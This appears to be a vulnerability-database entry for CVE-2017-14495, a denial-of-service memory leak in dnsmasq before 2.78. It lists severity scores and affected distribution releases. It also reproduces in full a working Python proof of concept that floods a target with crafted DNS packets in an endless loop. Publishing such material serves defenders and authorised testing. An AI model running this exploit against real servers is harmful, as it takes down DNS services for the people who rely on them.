CVE-2017-14495

high

Published 2017-10-03 · Modified 2026-05-13

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

7.5

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS v4 NEW

—

not yet in upstream

VIR risk

8.5

Description

Memory leak in dnsmasq before 2.78, when the --add-mac, --add-cpe-id or --add-subnet option is specified, allows remote attackers to cause a denial of service (memory consumption) via vectors involving DNS response creation.

Predictions

Exploit likelihood

83%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-42945 dos multiple verified text · 2 KB

Google Security Research · 2017-10-02

Dnsmasq < 2.78 - Lack of free() Denial of Service

text exploit Source: Exploit-DB

'''
Sources:
https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14495.py
https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html

dnsmasq is vulnerable only if one of the following option is specified: --add-mac, --add-cpe-id or --add-subnet.

'''

#!/usr/bin/python
#
# Copyright 2017 Google Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
#  Fermin J. Serna <fjserna@google.com>
#  Felix Wilhelm <fwilhelm@google.com>
#  Gabriel Campana <gbrl@google.com>
#  Kevin Hamacher <hamacher@google.com>
#  Gynvael Coldwin <gynvael@google.com>
#  Ron Bowes - Xoogler :/

import socket
import sys


def oom():
  data = '''01 0d 08 1b 00 01 00 00  00 00 00 02 00 00 29 04
00 00 29 00 00 00 03 00  00 01 13 00 08 01 13 79
00 00 00 00 00
  '''.replace(' ', '').replace('\n', '').decode('hex')
  data = data.replace('\x00\x01\x13\x00', '\x7f\x00\x00\x01')
  return data

if __name__ == '__main__':
  if len(sys.argv) != 3:
    print 'Usage: %s <ip> <port>' % sys.argv[0]
    sys.exit(0)

  ip = sys.argv[1]
  port = int(sys.argv[2])

  packet = oom()

  s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  s.setsockopt(socket.SOL_SOCKET,socket.SO_BROADCAST, 1)
  while True:
    s.sendto(packet, (ip, port))
    #break
  s.close()

OS impact

Red Hat Affected 1 release

Version	Status	Fixed in
7.0	Affected	—

SUSE Affected 1 release

Version	Status	Fixed in
—	Affected	—

Ubuntu Affected 3 releases

Version	Status	Fixed in
17.04	Affected	—
16.04	Affected	—
14.04	Affected	—

Debian Mixed 8 releases

Version	Status	Fixed in
trixie	Fixed	`2.78-1`
sid	Fixed	`2.78-1`
forky	Fixed	`2.78-1`
bullseye	Fixed	`2.78-1`
bookworm	Fixed	`2.78-1`
9.0	Affected	—
7.1	Affected	—
7.0	Affected	—

Arch Fixed 1 release

Version	Status	Fixed in
—	Fixed	`2.78-1`

Application impact

Vendor	Product	Versions	Fixed
thekelleys	dnsmasq	`{"endIncluding":"2.77"}`

References

CWEs

CWE-772

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.